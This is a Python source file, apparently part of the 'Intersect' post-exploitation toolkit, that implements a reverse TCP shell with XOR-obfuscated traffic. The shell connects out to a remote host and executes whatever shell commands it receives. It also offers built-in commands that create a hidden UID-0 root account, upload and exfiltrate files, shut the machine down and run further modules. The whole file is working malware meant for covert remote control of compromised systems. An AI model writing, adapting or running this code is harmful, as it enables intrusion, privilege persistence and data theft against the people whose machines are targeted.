
def xor(string, key):
    '''
    @description: Opens a reverse XOR ciphered TCP shell to a remote host. Interactive shell with download/upload and remote Intersect module execution.
    @author: ohdae [bindshell@live.com]
    @short: reverse XOR TCP shell
    '''
    data = ''
    for char in string:
        for ch in key:
            char = chr(ord(char) ^ ord(ch))
        data += char
    return data
  

def reversexor():
    socksize = 4096
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        conn.connect((RHOST, RPORT))
        conn.send(xor("[+] New connection established!", PKEY))
        conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))
    except:
        print("[!] Connection error!")
        sys.exit(2)

    while True:
        cmd = conn.recv(socksize)
        cmd2 = xor(cmd, PKEY)
        proc = Popen(cmd2,
             shell=True,
             stdout=PIPE,
             stderr=PIPE,
             stdin=PIPE,
             )
        stdout, stderr = proc.communicate()

        if cmd2.startswith('cd'):
            destination = cmd2[3:].replace('\n','')
            if os.path.isdir(destination):
                os.chdir(destination)
                conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))
            elif os.path.isdir(os.getcwd()+destination):
                os.chdir(os.getcwd()+destination)
                conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))
            else:
                conn.send(xor("[!] Directory does not exist", PKEY)) 
                conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))

        elif cmd2.startswith(':addroot'):
            strip = cmd.split(" ")
            acct = strip[1]
            os.system("/usr/sbin/useradd -M -o -s /bin/bash -u 0 -l " + acct)
            conn.send(xor("[+] Root account " + acct + " has been created.", PKEY))

        elif cmd2.startswith(':upload'):
            getname = cmd2.split(" ")
            rem_file = getname[1]
            filename = rem_file.replace("/","_")
            data = conn.recv(socksize)
            filedata = xor(data, PKEY)
            newfile = file(filename, "wb")
            newfile.write(filedata)
            newfile.close()
            if os.path.isfile(filename):
                conn.send(xor("[+] File upload complete!", PKEY))
            if not os.path.isfile(filename):
                conn.send(xor("[!] File upload failed! Please try again", PKEY))

        elif cmd2.startswith(':download'):
            getname = cmd2.split(" ")
            loc_file = getname[1]
            if os.path.exists(loc_file) is True:
                sendfile = open(loc_file, "r")
                filedata = sendfile.read()
                sendfile.close()
                senddata = xor(filedata, PKEY)
                conn.sendall(senddata)
            else:
                conn.send(xor("[+] File not found!", PKEY))

        elif cmd2.startswith(":reboot"):
            conn.send(xor("[!] Server system is going down for a reboot!", PKEY))
            os.system("shutdown -h now")
 
        elif cmd2 == (":mods"):
            conn.send(xor(str(modList), PKEY))
            conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))

        elif cmd2.startswith(":exec"):
            getmod = cmd2.split(" ")
            rmod = getmod[1]
            if rmod in modList:
                rmod = rmod+"()"
                exec rmod
                conn.send(xor("\n[+] Executing module...", PKEY))
            else:
                conn.send(xor("\n[!] Module not loaded!", PKEY))

        elif cmd2 == (':killme'):
            conn.send(xor("[!] Shutting down shell!\n", PKEY))
            conn.close()
            sys.exit(0)

        elif proc:
            conn.send(xor( stdout , PKEY))
            conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))


